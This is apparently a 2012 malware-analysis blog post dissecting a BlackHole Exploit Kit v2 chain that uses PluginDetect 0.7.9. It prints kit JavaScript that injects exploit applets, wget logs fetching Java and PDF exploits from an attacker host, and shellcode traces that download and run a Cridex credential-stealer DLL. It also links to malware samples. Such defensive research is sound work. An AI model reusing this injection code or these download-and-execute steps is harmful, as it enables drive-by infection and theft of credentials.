Sunday, November 18, 2012

PluginDetect 0.7.9 infector "et" Cridex Payloads of BlackHole Exploit Kit v2 (203.80.16.81) used CVE-2012-4681, CVE-2012-5076, CVE-2009-0927++ 

I came into PluginDetect 0.7.9 usage in the BHEK2 recently.
The software PluginDetect 0.7.9 was released today in with the following details:
PluginDetect Library
version: 0.7.9
released: 10/17/2012
by Eric Gerds

You can see it yourself in its website here --->>[CLICK]
Or see the below capture pic of the site (click to enlarge)


If you click the "Download PluginDetect" menu on the left side, you'll see
a javascript generator of PluginDetect, as per picture below:


After you choose your options on which components to detect of a browser,
this generator applet will burp a javascript code result like below:

↑If you see closely to the marked part of the code then you will recognize it -
as our old friend PluginDetect used to be used by BlackHole Exploit Kit v2/BHEK2.

PluginDetect is actually a useful good code to create a detection of a browser, 
however BHEK2 and other EK is misused it for the bad purpose.

We know that BHEK2 were previously using PluginDetect 0.7.8, but today I bumped 
to infector with using PluginDetect 0.7.9 with CVE-2012-5076 & below is the story:

Hinted by our @Hulk_Crusader, we investigated an infector site at: fi.mattlemons.org
It contains a lot of infector links as per snipped below:

   [1]Name          [2]Last modified    [3]Size  
------------------------------------------------
  [5]Jssl.php           16-Nov-2012 05:52   73K
  [6]aVhg.html          11-Nov-2012 06:21  391
  [7]bVhg.html          11-Nov-2012 06:21  611
  [8]bablo5.php         16-Nov-2012 16:05   67
  [9]bind.php           11-Nov-2012 07:24   12K
  [10]faqPkOE.php       11-Nov-2012 07:32  8.2K
  [11]favicon.gif       05-Sep-2011 14:17    0
  [12]favicon.ico       05-Sep-2011 14:17    0
  [13]index.main.php    16-Nov-2012 05:47  4.0K
  [14]info.php          16-Nov-2012 05:49   34K
  [15]jorik5.php        16-Nov-2012 16:05   74
  [16]joy.php           16-Nov-2012 05:49  5.5K
  [17]mainEFjd.php      16-Nov-2012 05:49  8.2K
  [18]mainVjH.php       16-Nov-2012 05:49  8.2K
  [19]page8.htm         16-Nov-2012 15:11  1.0K
  [20]rVhg.html         11-Nov-2012 06:21  744
  [21]sVhg.html         11-Nov-2012 06:21  664
  [22]seo4.php          16-Nov-2012 16:05   70
  [23]sitemapl82.php    16-Nov-2012 05:50  8.2K
  [24]stylecss.php      16-Nov-2012 05:51   24K
  [25]system_file.php   16-Nov-2012 15:11   71
  [26]topsale5.php      16-Nov-2012 16:05   67
  [27]w11292880n.php    16-Nov-2012 05:51   24K
  [28]w11384180n.php    16-Nov-2012 05:52   24K
  [29]w11884808n.php    16-Nov-2012 05:53   24K
  [30]w11991996n.php    16-Nov-2012 05:53   24K
  [31]w12272200n.php    16-Nov-2012 05:54   24K
  [32]w12745201n.php    09-Nov-2012 06:54  303K <=== suspicious
  [33]w14074084n.php    16-Nov-2012 05:54   92K
  [34]w14137042n.php    16-Nov-2012 05:54   92K
  [35]w14455434n.php    16-Nov-2012 05:55   24K
  [36]w15104461n.php    16-Nov-2012 05:56   70K
  [37]w16762030n.php    16-Nov-2012 05:56   24K
  [38]w17886614n.php    16-Nov-2012 05:56   70K
  [39]w18956554n.php    16-Nov-2012 05:57   24K
  [40]w19446592n.php    16-Nov-2012 05:58   24K
  [41]w19572944n.php    16-Nov-2012 05:58   24K
  [42]w20687587n.php    16-Nov-2012 05:58   24K
  [43]w21108783n.php    16-Nov-2012 05:58   24K
  [44]w22312966n.php    16-Nov-2012 06:00   24K
  [45]w24463996n.php    16-Nov-2012 06:00   24K
  [46]w24813801n.php    16-Nov-2012 06:02   24K
  [47]w24912540n.php    16-Nov-2012 06:03   24K
  [48]w25181459n.php    16-Nov-2012 06:05   24K
  [49]w25516725n.php    16-Nov-2012 06:05   92K
  [50]w26388892n.php    09-Nov-2012 06:37  297K <=== suspicious
  [51]w26953552n.php    16-Nov-2012 06:07   92K
  [52]w27341032n.php    16-Nov-2012 06:08   24K
  [53]w27711058n.php    16-Nov-2012 06:10   24K
  [54]w27944845n.php    16-Nov-2012 06:11   24K
  [55]w29438343n.php    16-Nov-2012 12:36   23K
  [56]w32104720n.php    16-Nov-2012 12:36   23K
  [57]w32403343n.php    16-Nov-2012 12:36   23K
  [58]w32844482n.php    16-Nov-2012 12:36   23K
  [59]w33118612n.php    16-Nov-2012 12:36   23K
  [60]w33764801n.php    16-Nov-2012 12:36   23K
  [61]w36011284n.php    16-Nov-2012 12:36   23K
  [62]w36584950n.php    09-Nov-2012 07:36  138K <=== suspicious
  [63]w37531540n.php    16-Nov-2012 12:36   23K
  [64]w37715594n.php    16-Nov-2012 12:36   23K
  [65]w37727072n.php    16-Nov-2012 12:36   23K
  [66]w38297236n.php    16-Nov-2012 12:36   23K
  [67]w38994382n.php    16-Nov-2012 12:36   23K
  [68]w39565125n.php    16-Nov-2012 12:36   23K
  [69]w39715194n.php    16-Nov-2012 12:36   23K
  [70]w41352222n.php    16-Nov-2012 12:36   23K
  [71]w42271663n.php    16-Nov-2012 12:36   92K
  [72]w42595965n.php    16-Nov-2012 12:36   23K
  [73]w43085485n.php    16-Nov-2012 12:36   23K
  [74]w43584820n.php    16-Nov-2012 12:36   23K
  [75]w45042947n.php    16-Nov-2012 12:36   23K
  [76]w48788700n.php    16-Nov-2012 12:36   23K
  [77]w49496620n.php    16-Nov-2012 12:36   23K
  [78]w49977014n.php    16-Nov-2012 12:36   23K
  [79]w51693290n.php    16-Nov-2012 12:36   23K
  [80]w52354703n.php    16-Nov-2012 12:36   23K
  [81]w54253689n.php    16-Nov-2012 12:36   23K
  [82]w54406687n.php    16-Nov-2012 12:36   23K
  [83]w54854224n.php    16-Nov-2012 12:36   23K
  [84]w54924852n.php    16-Nov-2012 12:36   23K
  [85]w55756681n.php    16-Nov-2012 12:36   23K
  [86]w56926790n.php    16-Nov-2012 12:36   69K
  [87]w57142260n.php    16-Nov-2012 12:36   23K
  [88]w57288477n.php    16-Nov-2012 12:36  160K <=== suspicious
  [89]w57363423n.php    16-Nov-2012 12:36   23K
  [90]w57574466n.php    16-Nov-2012 12:36   23K
  [91]w58386696n.php    16-Nov-2012 12:36   23K
  [92]w58414355n.php    16-Nov-2012 12:36   69K
  [93]w58824744n.php    16-Nov-2012 12:36   23K
  [94]w59182790n.php    16-Nov-2012 12:36   23K
  [95]w59615462n.php    16-Nov-2012 12:36   69K
  [96]w59702531n.php    16-Nov-2012 12:36   23K
  [97]w60326763n.php    09-Nov-2012 04:22  275K <=== suspicious
  [98]w61856170n.php    16-Nov-2012 12:36   23K
  [99]w62088643n.php    09-Nov-2012 07:38  161K <=== suspicious
  [100]w64137644n.php   16-Nov-2012 12:36  115K <=== suspicious
  [101]w64214598n.php   16-Nov-2012 12:36   69K
  [102]w64908493n.php   16-Nov-2012 12:36   23K
  [103]w64956301n.php   16-Nov-2012 12:36   23K
  [104]w65944817n.php   16-Nov-2012 12:36   92K
  [105]w65994077n.php   16-Nov-2012 12:36   23K
  [106]w66442417n.php   16-Nov-2012 12:36   23K
  [107]w67063022n.php   16-Nov-2012 12:36   23K
  [108]w67424797n.php   16-Nov-2012 12:36   69K
  [109]w68083912n.php   16-Nov-2012 12:36   92K
  [110]w68562749n.php   16-Nov-2012 12:36   23K
  [111]w69423332n.php   16-Nov-2012 12:36   23K
  [112]w69863913n.php   16-Nov-2012 12:36  115K <=== suspicious
  [113]w71004261n.php   16-Nov-2012 12:36   23K
  [114]w71254201n.php   16-Nov-2012 12:36   23K
  [115]w71703411n.php   16-Nov-2012 12:36   23K
  [116]w72627688n.php   16-Nov-2012 12:36   23K
  [117]w74483378n.php   16-Nov-2012 12:36   23K
  [118]w75274537n.php   16-Nov-2012 12:36  115K <=== suspicious
  [119]w78731488n.php   16-Nov-2012 12:36   92K
  [120]w80343543n.php   16-Nov-2012 12:36  160K <=== suspicious
  [121]w80903025n.php   09-Nov-2012 05:28  297K <=== suspicious
  [122]w81115093n.php   16-Nov-2012 12:36   23K
  [123]w81417750n.php   16-Nov-2012 12:36   23K
  [124]w82277330n.php   16-Nov-2012 12:36   69K
  [125]w82347261n.php   16-Nov-2012 12:36   23K
  [126]w84467943n.php   16-Nov-2012 12:36   23K
  [127]w85902715n.php   16-Nov-2012 12:36   69K
  [128]w86577171n.php   16-Nov-2012 12:36   23K
  [129]w86771427n.php   16-Nov-2012 12:36   23K
  [130]w86911411n.php   16-Nov-2012 12:36   23K
  [131]w86982141n.php   16-Nov-2012 12:36   92K
  [132]w87326315n.php   16-Nov-2012 12:36   23K
  [133]w88145056n.php   16-Nov-2012 12:36   92K
  [134]w88205733n.php   16-Nov-2012 12:36  137K <=== suspicious
  [135]w88685477n.php   16-Nov-2012 12:36   23K
  [136]w89338108n.php   16-Nov-2012 12:36   23K
  [137]w89476290n.php   16-Nov-2012 12:36  137K <=== suspicious
  [138]w89705559n.php   16-Nov-2012 12:36   23K
  [139]wp-conf.php      15-Nov-2012 22:26  185K <=== suspicious
*)I marked the suspicious filea above↑ I bet they are trojan malwares! 
(Hint: See the size of the files)

Sadly the web server is well tuned & using ACL to block access, 
so we successfully fetched some files only, as per below:

aVhg.html     2a3e59f3088c06329e01acc3f4392e6f
bablo5.php    0423f6942706d9b36fc5551b472f12d9
jorik5.php    6e1a175421632987e00a589a93653e56
seo4.php      89cfb895e3381c2f174ef24e8c664839
topsale5.php  5e9eb5ddf71e1b4c56375c85aae92c69
page8.htm     57f31d9fc68cc28f1051028d761d8afc
All ↑files are mostly spam redirector but page8.htm contains malicious code:

Which we decoded easily to be like this:

↑Which is showing a malicious url of BHEK pattern. 
Shortly, we fetched it & by the TCP/HTTP data we can be sure is a BHEK:

--21:17:54--  
h00p://203.80.16.81:8080/forum/links/column.php
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/links/column.php HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking on your door |-(
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...

---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sat, 17 Nov 2012 20:40:41 GMT
Content-Type: text/html; charset=CP-1251
Connection: close
X-Powered-By: PHP/5.3.18-1~dotdeb.0
Vary: Accept-Encoding
---response end---
200 OK
Length: unspecified [text/html]
Closed fd 1920
21:17:56 (43.56 KB/s) - `column.php' saved [31778]
The downloaded file contains a condensed Javascript as per below hexed code:

<html><head><title></title></head><body><script>try{if(window.document)window.document.body="asd"}catch(e
{var PluginDetect={version:"0.7.9",name:"PluginDetect",handler:function(c,b,a){return function(){c(b,a)}}
nction(b){return(typeof b=="string"&&(/\d/).test(b))},getNumRegx:/[\d][\d\.\_,-]*/,splitNumRegx:/[\.\_,-]
umRegx);b=f.split(e.splitNumRegx);for(a=0;a<Math.min(c.length,b.length);a++){if(g(c[a],10)>g(b[a],10)){re
test(e[a])){e[a]="0"}}return e.slice(0,4).join(",")},$$hasMimeType:function(a){return function(c){if(!a.i
j.isDefined(e)||e)?/\d/:0,k=c?new RegExp(c,"i"):0,a=navigator.plugins,g="",f,b,m;for(f=0;f<a.length;f++){
(m,"i"),h="",g=c?new RegExp(c,"i"):0,a,l,d,j=e.isString(k)?[k]:k;for(d=0;d<j.length;d++){if((f=e.hasMimeT
);b=h.formatNum(b);d=b.split(h.splitNumRegx);g=e.split(h.splitNumRegx);for(a=0;a<d.length;a++){if(c>-1&&a
if(g.length>0&&!f[g]){f[g]=f[a](f);delete f[a]}}catch(d){}}}},initObj:function(e,b,d){var a,c;if(e){if(e[...
You can see full original code in our pastebin -->>[PASTEBIN]
And a nice readable code can be seen here -->>[PASTEBIN]

Seeing the decoded code well, we can see the PluginDetect 0.7.9 logic is used in it.
The EK coder is misusing PluginDetect 0.7.9 base code for infection purpose.
And since PluginDetect 0.7.9 released officially it was already used by infectors.

Compares to the BHEK2 with previous PluginDetect 0.7.8, this version is using similar
method, however some changes was detected as per following summary:

Provided Exploits:

Msxml2.XMLHTTP
Msxml2.DOMDocument
Microsoft.XMLDOM
ShockwaveFlash.ShockwaveFlash
TDCCtl.TDCCtl
Shell.UIHelper
Scripting.Dictionary
wmplayer.ocx
Browser Access:
Accepting only access from these html headers ;-))

"Win",
"Mac",
"Linux",
"FreeBSD",
"iPhone",
"iPod",
"iPad",
"Win.*CE",
"Win.*Mobile",
"Pocket\s*PC"
Strictly get version info value of browser engine versions...

d.isGecko=(/Gecko/i).test(k)&&(/Gecko\s*\/\s*\d/i).test(l);
d.verGecko=d.isGecko?d.formatNum((/rv\s*\:\s*([\.\,\d]+)/i).test(l)?RegExp.$1:"0.9"):null;
d.isChrome=(/Chrome\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verChrome=d.isChrome?d.formatNum(RegExp.$1):null;
d.isSafari=((/Apple/i).test(j)||(!j&&!d.isChrome))&&(/Safari\s*\/\s*(\d[\d\.]*)/i).test(l);
d.verSafari=d.isSafari&&(/Version\s*\/\s*(\d[\d\.]*)/i).test(l)?d.formatNum(RegExp.$1):null;
d.isOpera=(/Opera\s*[\/]?\s*(\d+\.?\d*)/i).test(l);
d.verOpera=d.isOpera&&((/Version\s*\/\s*(\d+\.?\d*)/i).test(l)||1)?parseFloat(RegExp.$1,10):null;
d.addWinEvent("load",d.handler(d.runWLfuncs,d))


Infector plugins: 

1. Java Exploit

mimeType:"application/x-java-applet","application/x-java-vm",
"application/x-java-bean"],classID:"clsid:8AD9C840-044E-11D1-B3E9-00805F499D93"

Aimed for generic exploit affecte to below Java Versions:

[1,9,1,40]
[1,8,1,40]
[1,7,1,40]
[1,6,0,40]
[1,5,0,30]
[1,4,2,30]
[1,3,1,30]]
Also provided special handling for the specific Java version below:

k=[1,5,0,14],
j=[1,6,0,2],
h=[1,3,1,0],
g=[1,4,2,0],
f=[1,5,0,7]

2. Flash Exploit

mimeType:"application/x-shockwave-flash",progID:"ShockwaveFlash.ShockwaveFlash"
,classID:"clsid:D27CDB6E-AE6D-11CF-96B8-444553540000"
Replacing the downloaded object by this into exe in locals...
return e?e[0].replace(/[rRdD\.]/g,",").replace(/\s/g,""):null

3. Adobe Reader

mimeType:"application/pdf",navPluginObj:null,progID:["AcroPDF.PDF","PDF.PdfCtrl"],
classID:"clsid:CA8A9780-280D-11CF-A24D-444553540000"
Logic to check adobe version is:
if(pdfver[0]>0&&pdfver[0]<8)
(pdfver[0]==8||(pdfver[0]==9&&pdfver[1]<4) //Hint!

[Important!] New: makeSense function
We detect a new control called makeSense() function to check the PDF & Java versions, 
it uses the below applet code to get & pass parameter version & vendor info:

import java.applet.Applet;
public class A extends Applet
{
  public String getAppVersion()
  {
    return "3";  }

  public String getProp(String paramString)
  {
    String str = "";
    try {
      if ((paramString instanceof String)) str = System.getProperty(paramString); 
    }
    catch (Exception localException) {
    }
    return str;  }

  public String getVersion()
  {
    return getProp("java.version"); }

  public String getVendor()
  {
    return getProp("java.vendor");  }

  public void statusbar(String paramString)
  {
    try
    {
      if ((paramString instanceof String)) showStatus(paramString);
    }
    catch (Exception localException)
    {}}}
Let's go back to our case, this infection uses PluginDetect 0.7.9, 
So if we hit j1, j2 parameters correctly there are 2(two) jar malware downloads,
as per coded below:

function j1() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn2.jar" code="impossibla">
  <param name="val" value="0b0909041f"/>
  <param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139372c02170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}
function j2() {
  var d=document.createElement("div");
  d.innerHTML = '<applet archive="../data/spn.jar" code="impossibla">
  <param name="val" value="0b0909041f"/><
  param name="prime" value="3131271c083c181c3c37343c18371f181c181c312c174421233143323a11193138174321233a3c040b043d112c39081c1f373a1f37321f37321f080802043539270e1f37111f37231f08271f08081f37111f37111f08371f37361f3717020139370502170e392802382c390b"/></applet>';
  document.body.appendChild(d);
  return true;
}

Tracing the path and we get the jars as below:

--00:25:07--  h00p://203.80.16・81:8080/forum/data/spn.jar
           => `spn.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 12,745 (12K) [application/java-archive]
00:25:09 (37.62 KB/s) - `spn.jar' saved [12745/12745]

--00:25:14--  h00p://203.80.16・81:8080/forum/data/spn2.jar
           => `spn2.jar'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 21,607 (21K) [application/java-archive]
00:25:16 (49.66 KB/s) - `spn2.jar' saved [21607/21607]
These files are Java exploiter, 
There's abuse code of java.lang.String.inter CVE-2012-5076 code in "spn.jar" and -
also CVE-2012-4681 & CVE-2012-1723 in "spn2.jar"; used to exploit+download payload.
We will soon discussing these exploits.
Some internet operation strings in both files can be viewed soon, like:

* * * File: spn.jar
import java.net.URL;
 41: invokevirtual 51 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
 44: invokevirtual 55 java/net/URL:toString ()Ljava/lang/String;
103: new     56 java/net/URL
 :
106: dup
107: aload 4
109: invokespecial 71 java/net/URL: (Ljava/lang/String;)V
 :
137: checkcast     84 java/net/URLConnection
140: astore        6
142: aload         6
144: invokevirtual 86 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;

* * * File: spn2.jar
import java.net.URL;
 49: invokevirtual 232 java/lang/Class:getResource (Ljava/lang/String;)Ljava/net/URL;
 52: invokevirtual 236 java/net/URL:toString ()Ljava/lang/String;
113: new            68 java/net/URL
116: dup
117: aload 5
119: invokespecial 70 java/net/URL: (Ljava/lang/String;)V
148: checkcast    260 java/net/URLConnection
151: astore         7
153: aload          7
155: invokevirtual 262 java/net/URLConnection:getInputStream ()Ljava/io/InputStream;
Below is the Exploit CVE-2012-5076 code used in spn.jar (click to enlarge)

And below is the CVE-2012-4681 used in spn2.jar to download mess.. (click to enlarge)

↑is at the public static void impossibla(impossibld paramimpossibld) and in -
  the public Object impossibla()
As per advised by @Dr4g0nFlySm0k3, in "spn2.jar" at public class impossiblb we also 
detected exploit CVE-2012-1723 code as per snipped below (core code only):

PS: There is a quite long list of variables for gaining “type confusion”between -
static & an instance variable for this exploit, and I snipped them all at snapshot above, 
for more details please check download sample files provided at bottom post's link.
 
[NEW] I was just mentioned in twitter, thanks to @PhysicalDrive0,
that Java exploits always in threes, below is the message:

The first response I did was re-read the PluginDetect 0.7.9, and -
be 100% sure that there is no sign of spn3.jar in there, next, I checked last fetched -
spider logs.. couldn't find it either.
But I just tried to download it by following the path of spn.jar & spn2.jar and....

--2012-11-18 22:14:07--  h00p://203.80.16.81:8080/forum/data/spn3.jar
Connecting to 203.80.16.81:8080... connected.
Created socket 3.
---request begin---
GET /forum/data/spn3.jar HTTP/1.1
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie is knocking AGAIN on your door! |-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Sun, 18 Nov 2012 21:37:08 GMT
Content-Type: application/java-archive
Connection: keep-alive
Last-Modified: Mon, 22 Oct 2012 13:35:13 GMT
ETag: "1350005-521e-4cca5ec4d4640"
Accept-Ranges: bytes
Content-Length: 21022
---response end---
200 OK
Registered socket 3 for persistent reuse.
Length: 21022 (21K) [application/java-archive]
Saving to: `spn3.jar'
100%[=============>]21,022      43.2K/s   in 0.5s
2012-11-18 22:14:08 (43.2 KB/s) - `spn3.jar' saved [21022/21022]
↑By God, there is a spn3.jar!! But Why? Not in PluginDetect means no chance for infection..
Here's the snapshot, ↓it showed the file's upload date...

-rw-r--r--  1 xxx xxx  21022 Oct 22 22:35 spn3.jar
MD5 (spn3.jar) = 66c55d2cebc9d2d7b09a6e12b94fc1c9
So let's see what exploit it has inside, 
first, in the public class fewwebwegb it has CVE-2012-0507 ↓
 
second, in the public class fewwebwegc it has CVE-2012-4681 exploit code↓

↑These two exploits are double hitting the suspect's PC to break Java's privilege..

[NEW] There is also another file called "t.pdf" which is not written in PluginDetect
PoC (Thank's again to Physicaldrive0 for the hint) is as below:

--01:39:46--  h00p://203.80.16.81:8080/forum/data/t.pdf
           => `t.pdf'
Connecting to 203.80.16.81:8080... seconds 0.00, connected.
Created socket 1920.
---request begin---
GET /forum/data/t.pdf HTTP/1.0
Referer: h00p://fi.mattlemons.org/page8.htm
User-Agent: MalwareMustDie Now BANGING at your Door ||-((
Accept: */*
Host: 203.80.16.81:8080
Connection: Keep-Alive
---request end---
HTTP request sent, awaiting response...
---response begin---
HTTP/1.1 200 OK
Server: nginx/1.0.10
Date: Mon, 19 Nov 2012 01:02:39 GMT
Content-Type: application/pdf
Connection: keep-alive
Last-Modified: Fri, 14 Sep 2012 18:03:02 GMT
ETag: "13500e4-1fa7-4c9ad3c1e8180"
Accept-Ranges: bytes
Content-Length: 8103
---response end---
200 OK
Registered socket 1920 for persistent reuse.
Length: 8,103 (7.9K) [application/pdf]
01:39:47 (78.02 KB/s) - `t.pdf' saved [8103/8103]

$ ls -alF t.*
-rwx------   1 xxx xxx   8103 Sep 14 09:03 t.pdf
$ md5 t.pdf
MD5 (t.pdf) = d1e2ff36a6c882b289d3b736d915a6cc
It is a common Pidief exploit shellcode downloader, 
w/invalid xref it calls obfuscated code below to be extracted as shellcode, 

0000000004 00000 f
0000000772 00000 n
0000001087 00000 n
0000001137 00000 n
0000000000 00000 f
0000000000 65535 f
0000001284 00000 n
   :         :
0000035752 00000 n
0000036095 00000 n
0000000026 65535 f
0000000050 65535 f
0000000051 65535 f
This sample is having the highest detection ratio compares to other samples here:

MD5:          d1e2ff36a6c882b289d3b736d915a6cc
File size:    7.9 KB ( 8103 bytes )
File name:    t.pdf
File type:    PDF
Tags:        pdf acroform invalid-xref
Detection ratio:  22 / 43
URL: https://www.virustotal.com/file/1e9e19cc0e6c49f658f6205d19d3940698cbe22df6cdb149c8178857992473e7/analysis/

There is another p1 parameter as per coded below, to drop one more malicious PDF

function p1() {
  var d=document.createElement("div");
  d.innerHTML = "<iframe src=\"/forum/links/column.php?xrdbmuu="+x("c833f")+"&sckq="+x("laa")+"&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim="+x(pdfver.join("."))+"\"></iframe>";
  document.body.appendChild(d);   }
Decoding this PDF download URL it wasn't hard, took me 2minutes to figure the url :-)
Here's the proof:

--01:28:48--  h00p://203.80.16。81:8080/forum/links/column.php?xrdbmuu=30:1n:1i:1
i:33&sckq=39:2v:2v&bugeh=2v:1k:1m:32:33:1k:1k:31:1j:1o&hdulmrim=1o:1d:1g:1d:1f
           => `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%3A2v&bugeh
=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g%3A1d%3A1f
'
Connecting to 203.80.16・81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 27,788 (27K) [application/pdf]

01:28:50 (47.09 KB/s) - `column.php@xrdbmuu=30%3A1n%3A1i%3A1i%3A33&sckq=39%3A2v%
3A2v&bugeh=2v%3A1k%3A1m%3A32%3A33%3A1k%3A1k%3A31%3A1j%3A1o&hdulmrim=1o%3A1d%3A1g
%3A1d%3A1f' saved [27788/27788]
And here's my note in manually decoding:

a=x("c833f");
   function x(s)
   {
     d=[];
     for(i=0;i  "30:1n:1i:1i:33"

a=x("laa");
   function x(s)
   {
     d=[];
     for(i=0;i "39:2v:2v"

pdfver="9.1.0"
mypdf=(pdfver.join("."));
a=x(mypdf);
   function x(s)
   {
     d=[];
     for(i=0;i "1o:1d:1g:1d:1f"
In the PDF file 0x3CD5 we can see this malicious code -->>[PASTEBIN]
↑We saw the strings "parseInt(app.beep(0)).toString().substring(1,2)" is used 122times :-)
app.beep is a typical PDF function, the one digit integer resulted is the key.
example:

x="17777".toString().substring(1,2)
document.write(x); ===> "7"
↑Using above hint, the deobfs code is--->>[PASTEBIN]

There is the Exploit Code of CVE-2009-0927 here:


And also an obfuscated shellcode here(see var bjsg value):


The shellcode itself contains a "plain" download url:

↑It must've been a a copy paster level-work of malware retards :-)

Well, the url for download payload is as per below:

h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl
Download Proof:

 --03:22:55--  h00p://203.80.16.81:8080/forum/links/column.php?vfg=30:1n:1i:1i:33&cacjp=2v:1k:1m:32:33:1k:1k:31:1j:1o&zbrybx=1h&gfh=xdoq&hsphg=edixgidl
Connecting to 203.80.16.81:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 122,727 (120K) [application/x-msdownload]
100%[====================================>] 122,727      108.68K/s
03:22:57 (108.52 KB/s) - `column.php@vfg=....' saved [122727/122727]
The shellcode API calls (kernel32.dll & urlmon.dll) used for download is as below:

kernel32.VirtualProtect(lpAddress=0x4021be, dwSize=255)
kernel32.LoadLibraryA(lpFileName=urlmon)
kernel32.GetTempPathA(lpBuffer=0x22fa60, nBufferLength=248, [lpBuffer=C:\DOCUME~1\Administrator\LOCALS~1\Temp\])
urlmon.URLDownloadToFileA(pCaller=0, szURL=h00p://203.80.16.81:8080/forum/....., lpfnCB=0x0, szFileName=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll)
kernel32.WinExec(lpCmdLine=C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
kernel32.WinExec(lpCmdLine=regsvr32 -s C:\DOCUME~1\Administrator\LOCALS~1\Temp\wpbt0.dll, uCmdShow=0) 
kernel32.TerminateThread(dwExitCode=0)
So we saved the payload as wpbt0.dll, and quick examined it with the below results...
This malware drops the below files, before doing a self deletion:

C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp
C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat
C:\Documents and Settings\Administrator\Application Data\KB00695911.exe
Using CMD.EXE w/executed below command:

C:\WINDOWS\system32\cmd.exe
  |
  +->"C:\WINDOWS\system32\cmd.exe" /c "C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\exp1.tmp.bat" 
And the bat file will run the malware from new location: 

"C:\Documents and Settings\Administrator\Application Data\KB00695911.exe" 
Explaining the below executable API traces:

Address: 0x403872 
CreateRemoteThread(hProcess: 0x78, 
lpThreadAttributes: 0x0, 
dwStackSize: 0x0, 
lpStartAddress: 0x3ced50, 
lpParameter: 0x3c0000, 
dwCreationFlags: 0x0, 
lpThreadId: 0x0)

All of the sudden we saw the below malicious processes:

0x2b0 lsass.exe
0x6ec KB00085031.exe
From the previous findings, studying every malicious act of this binary,
we know is a trojan credential stealer, Cridex variant.


Samples downloads

Here is the picture of the captured payloads:


We share these samples for the research/study purpose--->>[HERE]


VirusTotal detection ratio analysis
@unixfreaxjp ~/malware]$ date
Sun Nov 18 04:38:25 JST 2012

column.php ( 2/44) -->09b4ceea8fd5e90eea21bc1e2c2892e4
sample.pdf (15/43) -->e2efc2bc128c7aa7643f025a68194a1e CVE-2009-0927
spn.jar    ( 3/44) -->fbdf22bf32946676dcb1408208a24945 CVE-2012-5076
spn2.jar   ( 3/44) -->e98cde0af1e59379e8aec2a7a813225f CVE-2012-4681 & CVE-2012-1723 
wpbt0.dll  ( 9/43) -->e673b7c943b7395cc9ad61a301652880
spn3.jar  ( 15/43) -->66c55d2cebc9d2d7b09a6e12b94fc1c9 CVE-2012-0507 & CVE-2012-4681
t.pdf     ( 22/43) -->d1e2ff36a6c882b289d3b736d915a6cc CVE-2009-2990


References of CVE Exploit used

MSFT-MMPC: A technical analysis on new Java vulnerability(CVE-2012-5076)-->[CLICK]
Immunity Products: Java 0day analysis (CVE-2012-4681) -->[CLICK]
EXPLOIT-DB: Adobe Acrobat/Reader Collab getIcon Universal Exploit(CVE-2009-0927)-->[CLICK]
Symantec: An Examination of Java Vulnerability CVE-2012-1723 -->[CLICK]
MSFT-MMPC: The rise of a new Java vulnerability - CVE-2012-1723 -->[CLICK]


Other NEW Refereces of PluginDetect BHEK 0.7.9 (The Non-Obfuscated JavaScript Version)

Sophos: Blackhole confusion. Custom builds or copycats? -->[HERE]
F-Secure: Cool-er Than Blackhole? -->[HERE]
Malware Don't Need Coffee: CVE-2012-5076 - Massively adopted - BHEK update to 2.0.1 -->[HERE]


[NEW!] Additional Info of PluginDetect BHEK 0.7.9 Obfuscated Version

We also detected obfuscation version of PluginDetect BHEK 0.7.9.
The sources are from 2(two) spam attachment HTML files as per below pics:


*) Thank's to Officer Ken Pryor (@KDPryor) for contributing the samples.

The attached HTML file is having code leads to the obfuscated PluginDetect 0.7.9 
Both spams is having same obfuscation code:


We can decode this code to find the PluginDetect urls as below: (click to enlarge)


The column.php is the obfuscation version of PluginDetect 0.7.9

It used a new pattern of deobfuscation, we decode it here-->>[PASTEBIN]
↑with the step by step text guidance on how to it.

The components of BHEK2 w/obfuscated  PluginDetect 0.7.9 is as usual:

↑these are the samples captured from that host (hamasutra.ru)
For the research purpose, here's all sample of this infection-->>[CLICK]

Furthermore hamasutra.ru is having some IPs & DNS, see --->>[PASTEBIN]
in those IP it has a LONG history of BHEK in past up to 30days -->>[PASTEBIN]

In case you are wondering of detection rates(CVE data is as per above list):
Email attached HTML1 (21/43) fa7b41a96360c09baad5b8fa210e6fae
Email attached HTML2 (11/43) 9d3ce7441ea6cffcc3aeee80238357fe
infector.pdf (21/43) 2c325f278f741e8b4cfe66af87b96c40 
  ↑This pdf decoding guide is here -->>[PASTEBIN]
spn3.jar (19/41) 66c55d2cebc9d2d7b09a6e12b94fc1c9 
